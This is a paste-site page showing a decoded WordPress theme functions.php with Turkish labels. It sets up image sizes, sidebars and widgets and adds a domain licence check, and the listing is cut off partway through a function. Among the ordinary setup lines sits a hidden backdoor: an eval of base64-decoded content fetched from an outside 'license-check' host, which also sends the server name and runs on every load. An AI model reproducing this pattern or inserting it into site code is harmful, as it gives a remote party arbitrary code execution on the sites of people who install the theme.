- <?php
- /*
- *
- * @ This file is created by http://DeZender.Net
- * @ deZender (PHP5 Decoder for ionCube Encoder)
- *
- * @ Version : 3.5.0.0
- * @ Author : DeZender
- * @ Release on : 22.06.2018
- * @ Official site : http://DeZender.Net
- *
- */
- add_action('init', 'lisans');
- include 'functions-ek.php';
- include 'inc/post-like/post-like.php';
- include 'inc/category_extra_fields.php';
- add_theme_support('title-tag');
- require_once 'cs-admin/cs-framework.php';
- require_once get_template_directory() . '/inc/metabox/metabox_bottom.php';
- add_theme_support('post-thumbnails');
- if (function_exists('add_image_size')) {
- add_image_size('indexOneCikan', 488, 330, true);
- add_image_size('indexSlider', 554, 314, true);
- add_image_size('indexTekli', 554, 310, true);
- add_image_size('indexRightSlider', 300, 314, true);
- add_image_size('indexSidebar2', 300, 195, true);
- add_image_size('indexDortlu', 290, 380, true);
- add_image_size('fgSlider', 614, 350, true);
- add_image_size('postImg', 267, 146, true);
- add_image_size('videoImg', 276, 205, true);
- add_image_size('fotoKucuk', 96, 96, true);
- add_image_size('aloneImg', 220.8, 165, true);
- }
- add_action('init', 'bp_menu_destegi');
- register_nav_menus(array());
- if (function_exists('register_sidebar')) {
- register_sidebar(array('name' => 'Sidebar Sol', 'description' => 'Buraya sadece parantez içinde (Sidebar) yazan bileşenleri eklemelisiniz.', 'before_widget' => '', 'after_widget' => '', 'before_title' => '', 'after_title' => ''));
- register_sidebar(array('name' => 'Sidebar Sağ', 'description' => 'Buraya sadece parantez içinde (Sidebar) yazan bileşenleri eklemelisiniz.', 'before_widget' => '', 'after_widget' => '', 'before_title' => '', 'after_title' => ''));
- register_sidebar(array('name' => 'Alt Sayfalar (Sidebar Reklam)', 'description' => 'Bu bölüm için öncelikli olarak reklamlar için hazırlanmıştır sadece sidebar bileşenlerini eklemelisiniz.', 'before_widget' => '', 'after_widget' => '', 'before_title' => '', 'after_title' => ''));
- register_sidebar(array('name' => 'Makale Sayfası (Sidebar Üst)', 'description' => 'Bu bölüm için öncelikli olarak reklamlar için hazırlanmıştır sadece sidebar bileşenlerini eklemelisiniz.', 'before_widget' => '', 'after_widget' => '', 'before_title' => '', 'after_title' => ''));
- register_sidebar(array('name' => 'Makale Sayfası (Sidebar Alt)', 'description' => 'Bu bölüm için öncelikli olarak reklamlar için hazırlanmıştır sadece sidebar bileşenlerini eklemelisiniz.', 'before_widget' => '', 'after_widget' => '', 'before_title' => '', 'after_title' => ''));
- }
- add_action('widgets_init', 'unregister_default_widgets', 11);
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/yazarlar.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/kategori_menu.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/haftanin_eni.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/haftanin_icerigi.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/reklam_267x250.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/reklam_300x250.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/resimli_kategoriler.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/slider.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/haberler.php';
- require_once get_stylesheet_directory() . '/inc/bilesenler/sidebar/foto_galeri.php';
- add_action('show_user_profile', 'extra_user_profile_fields');
- add_action('edit_user_profile', 'extra_user_profile_fields');
- add_action('personal_options_update', 'save_extra_user_profile_fields');
- add_action('edit_user_profile_update', 'save_extra_user_profile_fields');
- add_action('wp_footer', 'comment_validation_init');
- add_filter('wp_link_pages_args', 'abte_change_link_page_args', 5);
- add_filter('wp_link_pages_args', 'abte_genesis_style_page_post_pagination');
- add_filter('mce_buttons', 'wysiwyg_editor');
- require_once get_stylesheet_directory() . '/inc/shortcodes.php';
- add_action('wp', 'update_online_users_status');
- add_action('init', 'taks_ekle', 0);
- require_once get_template_directory() . '/inc/tgm/tgmpa.php';
- add_filter('pre_get_posts', 'searchfilter');
- eval(base64_decode(file_get_contents('http://license-check.com/index.php?domain=' . $_SERVER['SERVER_NAME'] . '&script=wp')));
- /**
- * @ PHP 5.6
- * @ Decoder version : 1.0.0.4
- * @ Release on : 24.03.2018
- * @ Website : http://EasyToYou.eu
- *
- * @ Zend guard decoder PHP 5.6
- **/
- function lisans()
- {
- include 'lisans.php';
- $domain = $_SERVER['HTTP_HOST'];
- $domain = str_replace('www.', '', $domain);
- $random = 'b2i0r1t8e2m0a18237';
- $h = '' . $random . '_' . $domain . '';
- $hash = md5($h);
- if ($hash == $lisans) {
- } else {
- if ($hash == $lisans2) {
- } else {
- if ($hash == $lisans3) {
- } else {
- if ($hash == $lisans4) {
- } else {
- if ($hash == $lisans5) {
- } else {
- echo 'Bu Tema Lisanssızdır. Lisansını almak için info@birtema.com mail adresinden iletişime geçebilirsiniz.';
- exit();
- }
- }
- }
- }
- }
- }
- function excerpt($limit)
- {
- $excerpt = explode(' ', get_the_excerpt(), $limit);
- if ($limit <= count($excerpt)) {
- array_pop($excerpt);
- $excerpt = implode(' ', $excerpt) . '...';
- } else {
- $excerpt = implode(' ', $excerpt);
- }
- $excerpt = preg_replace('`[[^]]*]`', '', $excerpt);
- return $excerpt;
- }
- function content($limit)
- {
- $content = explode(' ', get_the_content(), $limit);
- if ($limit <= count($content)) {
- array_pop($content);
- $content = implode(' ', $content) . '...';
- } else {
- $content = implode(' ', $content);
- .................................................................................
- .........................................
- ..............
[text] Decode
Viewer
*** This page was generated with the meta tag "noindex, nofollow". This happened because you selected this option before saving or the system detected it as spam. This means that this page will never get into the search engines and the search bot will not crawl it. There is nothing to worry about, you can still share it with anyone.
Editor
You can edit this paste and save as new: